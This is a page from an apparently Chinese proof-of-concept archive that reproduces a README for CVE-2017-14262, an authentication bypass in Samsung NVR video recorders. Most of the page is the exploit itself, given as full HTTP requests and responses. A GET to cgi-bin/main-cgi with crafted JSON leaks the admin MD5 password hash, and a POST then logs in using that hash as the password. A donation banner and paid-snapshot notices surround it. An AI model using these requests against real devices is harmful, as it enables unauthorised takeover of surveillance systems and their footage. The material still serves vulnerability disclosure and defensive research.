Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2017-14262 PoC — Samsung NVR设备安全漏洞

Source
https://github.com/zzz66686/CVE-2017-14262
Associated Vulnerability
Title:Samsung NVR设备安全漏洞 (CVE-2017-14262)
Description:On Samsung NVR devices, remote attackers can read the MD5 password hash of the 'admin' account via certain szUserName JSON data to cgi-bin/main-cgi, and login to the device with that hash in the szUserPasswd parameter.
Readme
# Samsung_NVR_vul

## CVE-2017-14262
## xfuturesec Co., Ltd

### First, get the MD5 hash password of the 'admin' account.

Send:  
GET http://192.168.1.14/cgi-bin/main-cgi?json={"cmd":201,"szUserName_Qry":"admin","szUserName":"","u32UserLoginHandle":0} HTTP/1.1  
Host: 192.168.1.14  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Connection: keep-alive  

Recv:  
HTTP/1.1 200 OK  
Content-Type: text/html;CHARset=utf-8  

{  
	"szUserName":	"",  
	"szLoginPasswd":	"e10adc3949ba59abbe56e057f20f883e",  
	"au32LoginPasswd":	[13423221, 5515125, 6390751, 4733341, 12838108, 13423221, 5515125, 6390751, 10132668, 371291, 12838108, 13423221, 5515125, 10132668, 371291, 13423221, 10132668, 371291, 0, 0],  
	"u16UserPermissionCnt":	1,  
	"u8UserRole":	0,  
	"u8UserBasePermission":	255,  
	"u16UserExtralPermissionCnt":	1,  
	"u32UserLivePermission":	[4294967295],  
	"u32UserPTZPermission":	[4294967295],  
	"u32UserVODPermission":	[4294967295],  
	"u32UserRecordPermission":	[4294967295],  
	"u32UserLocalBackup":	[4294967295], 
	"code":	0,  
	"success":	true  
}  

"szLoginPasswd":	"e10adc3949ba59abbe56e057f20f883e" is the MD5 hash password of 'admin' account.  

Now, we have the MD5 hash password.


### Second, log in to the device with that MD5 hash.

Send:  

POST http://192.168.1.100/cgi-bin/main-cgi HTTP/1.1  
Accept: text/html, application/xhtml+xml, */*  
Referer: http://192.168.1.100/  
Accept-Language: zh-CN  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko  
Content-Type: application/x-www-form-urlencoded  
Accept-Encoding: gzip, deflate  
Connection: Keep-Alive  
Content-Length: 246  
DNT: 1  
Host: 192.168.1.100  
Pragma: no-cache  

lLan=0&szUserName=admin&szUserPasswd=e10adc3949ba59abbe56e057f20f883e&szUserPasswdEx=%5B6477625%2C24215867%2C12838108%2C11382568%2C7503741%2C7198498%2C24215867%2C7503741%2C7198498%2C23345327%2C7198498%2C10192199%2C23345327%2C7198498%2C10192199%5D

szUserPasswd=e10adc3949ba59abbe56e057f20f883e is the MD5 hash password we read from the first step.

Now, we log in to the device with 'admin' account.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →